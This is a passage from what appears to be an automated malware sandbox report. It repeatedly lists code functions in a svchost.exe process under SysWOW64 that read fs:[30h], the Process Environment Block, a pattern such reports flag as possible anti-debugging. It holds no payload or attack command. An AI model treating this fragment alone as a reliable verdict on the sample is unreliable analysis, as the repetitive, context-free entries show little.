            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604164 mov eax, dword ptr fs:[00000030h]2_2_03604164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604164 mov eax, dword ptr fs:[00000030h]2_2_03604164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536154 mov eax, dword ptr fs:[00000030h]2_2_03536154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536154 mov eax, dword ptr fs:[00000030h]2_2_03536154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h]2_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h]2_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C4144 mov ecx, dword ptr fs:[00000030h]2_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h]2_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h]2_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DA118 mov ecx, dword ptr fs:[00000030h]2_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DA118 mov eax, dword ptr fs:[00000030h]2_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DA118 mov eax, dword ptr fs:[00000030h]2_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DA118 mov eax, dword ptr fs:[00000030h]2_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F0115 mov eax, dword ptr fs:[00000030h]2_2_035F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]2_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov ecx, dword ptr fs:[00000030h]2_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]2_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]2_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov ecx, dword ptr fs:[00000030h]2_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]2_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]2_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov ecx, dword ptr fs:[00000030h]2_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]2_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov ecx, dword ptr fs:[00000030h]2_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03560124 mov eax, dword ptr fs:[00000030h]2_2_03560124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036061E5 mov eax, dword ptr fs:[00000030h]2_2_036061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h]2_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h]2_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h]2_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h]2_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F61C3 mov eax, dword ptr fs:[00000030h]2_2_035F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F61C3 mov eax, dword ptr fs:[00000030h]2_2_035F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035601F8 mov eax, dword ptr fs:[00000030h]2_2_035601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B019F mov eax, dword ptr fs:[00000030h]2_2_035B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B019F mov eax, dword ptr fs:[00000030h]2_2_035B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B019F mov eax, dword ptr fs:[00000030h]2_2_035B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B019F mov eax, dword ptr fs:[00000030h]2_2_035B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352A197 mov eax, dword ptr fs:[00000030h]2_2_0352A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352A197 mov eax, dword ptr fs:[00000030h]2_2_0352A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352A197 mov eax, dword ptr fs:[00000030h]2_2_0352A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03570185 mov eax, dword ptr fs:[00000030h]2_2_03570185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035EC188 mov eax, dword ptr fs:[00000030h]2_2_035EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035EC188 mov eax, dword ptr fs:[00000030h]2_2_035EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D4180 mov eax, dword ptr fs:[00000030h]2_2_035D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D4180 mov eax, dword ptr fs:[00000030h]2_2_035D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03532050 mov eax, dword ptr fs:[00000030h]2_2_03532050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6050 mov eax, dword ptr fs:[00000030h]2_2_035B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355C073 mov eax, dword ptr fs:[00000030h]2_2_0355C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h]2_2_0354E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h]2_2_0354E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h]2_2_0354E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h]2_2_0354E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B4000 mov ecx, dword ptr fs:[00000030h]2_2_035B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C6030 mov eax, dword ptr fs:[00000030h]2_2_035C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352A020 mov eax, dword ptr fs:[00000030h]2_2_0352A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352C020 mov eax, dword ptr fs:[00000030h]2_2_0352C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B20DE mov eax, dword ptr fs:[00000030h]2_2_035B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352C0F0 mov eax, dword ptr fs:[00000030h]2_2_0352C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035720F0 mov ecx, dword ptr fs:[00000030h]2_2_035720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0352A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035380E9 mov eax, dword ptr fs:[00000030h]2_2_035380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B60E0 mov eax, dword ptr fs:[00000030h]2_2_035B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353208A mov eax, dword ptr fs:[00000030h]2_2_0353208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F60B8 mov eax, dword ptr fs:[00000030h]2_2_035F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F60B8 mov ecx, dword ptr fs:[00000030h]2_2_035F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035280A0 mov eax, dword ptr fs:[00000030h]2_2_035280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C80A8 mov eax, dword ptr fs:[00000030h]2_2_035C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530750 mov eax, dword ptr fs:[00000030h]2_2_03530750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BE75D mov eax, dword ptr fs:[00000030h]2_2_035BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572750 mov eax, dword ptr fs:[00000030h]2_2_03572750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572750 mov eax, dword ptr fs:[00000030h]2_2_03572750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B4755 mov eax, dword ptr fs:[00000030h]2_2_035B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356674D mov esi, dword ptr fs:[00000030h]2_2_0356674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356674D mov eax, dword ptr fs:[00000030h]2_2_0356674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356674D mov eax, dword ptr fs:[00000030h]2_2_0356674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538770 mov eax, dword ptr fs:[00000030h]2_2_03538770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530710 mov eax, dword ptr fs:[00000030h]2_2_03530710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03560710 mov eax, dword ptr fs:[00000030h]2_2_03560710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356C700 mov eax, dword ptr fs:[00000030h]2_2_0356C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356273C mov eax, dword ptr fs:[00000030h]2_2_0356273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356273C mov ecx, dword ptr fs:[00000030h]2_2_0356273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356273C mov eax, dword ptr fs:[00000030h]2_2_0356273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AC730 mov eax, dword ptr fs:[00000030h]2_2_035AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356C720 mov eax, dword ptr fs:[00000030h]2_2_0356C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356C720 mov eax, dword ptr fs:[00000030h]2_2_0356C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353C7C0 mov eax, dword ptr fs:[00000030h]2_2_0353C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B07C3 mov eax, dword ptr fs:[00000030h]2_2_035B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035347FB mov eax, dword ptr fs:[00000030h]2_2_035347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035347FB mov eax, dword ptr fs:[00000030h]2_2_035347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035527ED mov eax, dword ptr fs:[00000030h]2_2_035527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035527ED mov eax, dword ptr fs:[00000030h]2_2_035527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035527ED mov eax, dword ptr fs:[00000030h]2_2_035527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BE7E1 mov eax, dword ptr fs:[00000030h]2_2_035BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D678E mov eax, dword ptr fs:[00000030h]2_2_035D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035307AF mov eax, dword ptr fs:[00000030h]2_2_035307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E47A0 mov eax, dword ptr fs:[00000030h]2_2_035E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354C640 mov eax, dword ptr fs:[00000030h]2_2_0354C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03562674 mov eax, dword ptr fs:[00000030h]2_2_03562674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F866E mov eax, dword ptr fs:[00000030h]2_2_035F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F866E mov eax, dword ptr fs:[00000030h]2_2_035F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A660 mov eax, dword ptr fs:[00000030h]2_2_0356A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A660 mov eax, dword ptr fs:[00000030h]2_2_0356A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572619 mov eax, dword ptr fs:[00000030h]2_2_03572619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE609 mov eax, dword ptr fs:[00000030h]2_2_035AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E627 mov eax, dword ptr fs:[00000030h]2_2_0354E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03566620 mov eax, dword ptr fs:[00000030h]2_2_03566620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03568620 mov eax, dword ptr fs:[00000030h]2_2_03568620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353262C mov eax, dword ptr fs:[00000030h]2_2_0353262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0356A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A6C7 mov eax, dword ptr fs:[00000030h]2_2_0356A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]2_2_035AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]2_2_035AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]2_2_035AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]2_2_035AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B06F1 mov eax, dword ptr fs:[00000030h]2_2_035B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B06F1 mov eax, dword ptr fs:[00000030h]2_2_035B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03534690 mov eax, dword ptr fs:[00000030h]2_2_03534690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03534690 mov eax, dword ptr fs:[00000030h]2_2_03534690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035666B0 mov eax, dword ptr fs:[00000030h]2_2_035666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356C6A6 mov eax, dword ptr fs:[00000030h]2_2_0356C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538550 mov eax, dword ptr fs:[00000030h]2_2_03538550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538550 mov eax, dword ptr fs:[00000030h]2_2_03538550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356656A mov eax, dword ptr fs:[00000030h]2_2_0356656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356656A mov eax, dword ptr fs:[00000030h]2_2_0356656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356656A mov eax, dword ptr fs:[00000030h]2_2_0356656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C6500 mov eax, dword ptr fs:[00000030h]2_2_035C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]2_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]2_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]2_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]2_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]2_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]2_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]2_2_0355E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]2_2_0355E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]2_2_0355E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]2_2_0355E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]2_2_0355E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035365D0 mov eax, dword ptr fs:[00000030h]2_2_035365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A5D0 mov eax, dword ptr fs:[00000030h]2_2_0356A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A5D0 mov eax, dword ptr fs:[00000030h]2_2_0356A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E5CF mov eax, dword ptr fs:[00000030h]2_2_0356E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E5CF mov eax, dword ptr fs:[00000030h]2_2_0356E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035325E0 mov eax, dword ptr fs:[00000030h]2_2_035325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356C5ED mov eax, dword ptr fs:[00000030h]2_2_0356C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356C5ED mov eax, dword ptr fs:[00000030h]2_2_0356C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E59C mov eax, dword ptr fs:[00000030h]2_2_0356E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03532582 mov eax, dword ptr fs:[00000030h]2_2_03532582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03532582 mov ecx, dword ptr fs:[00000030h]2_2_03532582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03564588 mov eax, dword ptr fs:[00000030h]2_2_03564588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035545B1 mov eax, dword ptr fs:[00000030h]2_2_035545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035545B1 mov eax, dword ptr fs:[00000030h]2_2_035545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B05A7 mov eax, dword ptr fs:[00000030h]2_2_035B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B05A7 mov eax, dword ptr fs:[00000030h]2_2_035B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B05A7 mov eax, dword ptr fs:[00000030h]2_2_035B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035EA456 mov eax, dword ptr fs:[00000030h]2_2_035EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352645D mov eax, dword ptr fs:[00000030h]2_2_0352645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355245A mov eax, dword ptr fs:[00000030h]2_2_0355245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355A470 mov eax, dword ptr fs:[00000030h]2_2_0355A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355A470 mov eax, dword ptr fs:[00000030h]2_2_0355A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355A470 mov eax, dword ptr fs:[00000030h]2_2_0355A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BC460 mov ecx, dword ptr fs:[00000030h]2_2_035BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03568402 mov eax, dword ptr fs:[00000030h]2_2_03568402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03568402 mov eax, dword ptr fs:[00000030h]2_2_03568402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03568402 mov eax, dword ptr fs:[00000030h]2_2_03568402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A430 mov eax, dword ptr fs:[00000030h]2_2_0356A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352E420 mov eax, dword ptr fs:[00000030h]2_2_0352E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352E420 mov eax, dword ptr fs:[00000030h]2_2_0352E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352E420 mov eax, dword ptr fs:[00000030h]2_2_0352E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352C427 mov eax, dword ptr fs:[00000030h]2_2_0352C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
